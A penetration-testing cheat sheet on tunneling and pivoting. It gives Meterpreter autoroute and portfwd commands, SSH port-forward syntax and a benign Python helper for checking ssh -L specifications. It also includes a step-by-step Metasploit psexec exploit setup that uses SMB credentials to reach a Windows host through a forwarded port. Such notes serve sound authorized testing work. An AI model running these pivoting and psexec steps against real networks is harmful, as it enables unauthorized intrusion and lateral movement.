Tunneling & Pivoting

Before starting, note three values: the IP address of the target host, the port you want to reach on it, and the local port you will listen on. That local port is unavailable to anything else for as long as the forward is active and you are interacting with the target port through it.

autoroute

From within a Meterpreter session:

run autoroute -s [subnet] -n [netmask]

Example:

run autoroute -s 192.168.10.0 -n 255.255.255.0

portfwd

Configure autoroute first (see above), then add the forward from within the Meterpreter session:

portfwd add -L 127.0.0.1 -l [local_port] -p [remote_port] -r [remote_host]

Example:

Within a Meterpreter session (<rhp> is the local port you chose to listen on):

meterpreter> portfwd add -L 127.0.0.1 -l <rhp> -r 192.168.30.9 -p 445

Pivoting

  1. Configure portfwd (see above)
  2. Set up PSExec against the forwarded port
    a. background
    b. use exploit/windows/smb/psexec
    c. set lhost 172.16.10.15
    d. set lport <rhp>
    e. set rhost 127.0.0.1
    f. set rport <rhp>
    g. set smbuser <user>
    h. set smbdomain <domain.root>
    i. set smbpass <password>

SSH Tunneling

When initiating the tunnel during session creation

ssh -C -L 8080:<target IP address>:80 user@remote_host

When adding the tunnel from within an existing ssh session: press Enter, then type the ~C escape to open the ssh> command line. That prompt accepts -L, -R and -D forwards (and -KL/-KR/-KD to cancel them), but not -C; compression has to be requested when the session is started.

ssh> -L 8080:<local IP address>:80

Port Forwarding

Syntax:

# From the local machine, when opening the session
ssh -C -L [local_port]:[remote_host]:[remote_port] [user]@[ssh_server]
# From inside an existing session (open the prompt with the ~C escape; -C is not accepted here)
ssh> -L [local_port]:[local_host]:[remote_port]
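As an added example (not part of the original cheat sheet), a small Python helper that parses the ssh -L forwarding syntax shown above, including bracketed IPv6 hosts, and checks the caveat from the top of the page: that the chosen local port must still be free before the tunnel claims it. All names are my own.

```python
import socket
from dataclasses import dataclass


@dataclass
class LocalForward:
    bind_address: str   # address the ssh client listens on
    local_port: int     # the local port that becomes unavailable to others
    remote_host: str    # host as resolved from the ssh server's side
    remote_port: int


def _split_on_colons(spec: str) -> list:
    """Split on ':' while leaving bracketed IPv6 literals such as [::1] intact."""
    parts, current, depth = [], "", 0
    for ch in spec:
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
        if ch == ":" and depth == 0:
            parts.append(current)
            current = ""
        else:
            current += ch
    parts.append(current)
    return parts


def _port(value: str) -> int:
    port = int(value)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range: {value}")
    return port


def parse_local_forward(spec: str, default_bind: str = "127.0.0.1") -> LocalForward:
    """Parse an ssh -L argument of the form [bind_address:]port:host:hostport."""
    parts = _split_on_colons(spec)
    if len(parts) == 3:              # bind address omitted: ssh defaults to loopback
        parts = [default_bind] + parts
    if len(parts) != 4:
        raise ValueError(f"expected [bind_address:]port:host:hostport, got {spec!r}")
    bind, port, host, hostport = parts
    return LocalForward(bind.strip("[]"), _port(port), host.strip("[]"), _port(hostport))


def local_port_is_free(port: int, bind_address: str = "127.0.0.1") -> bool:
    """True if nothing is already bound to bind_address:port (no SO_REUSEADDR, so
    an existing listener is reported as a conflict)."""
    family = socket.AF_INET6 if ":" in bind_address else socket.AF_INET
    try:
        with socket.socket(family, socket.SOCK_STREAM) as s:
            s.bind((bind_address, port))
        return True
    except OSError:
        return False


def check_forward(spec: str) -> tuple:
    """Parse the spec and report whether its local port can still be bound."""
    fwd = parse_local_forward(spec)
    return fwd, local_port_is_free(fwd.local_port, fwd.bind_address)
```

Run check_forward("8080:10.0.0.5:80") before issuing the ssh command; a False second element means the local port is already taken and the forward will fail to bind.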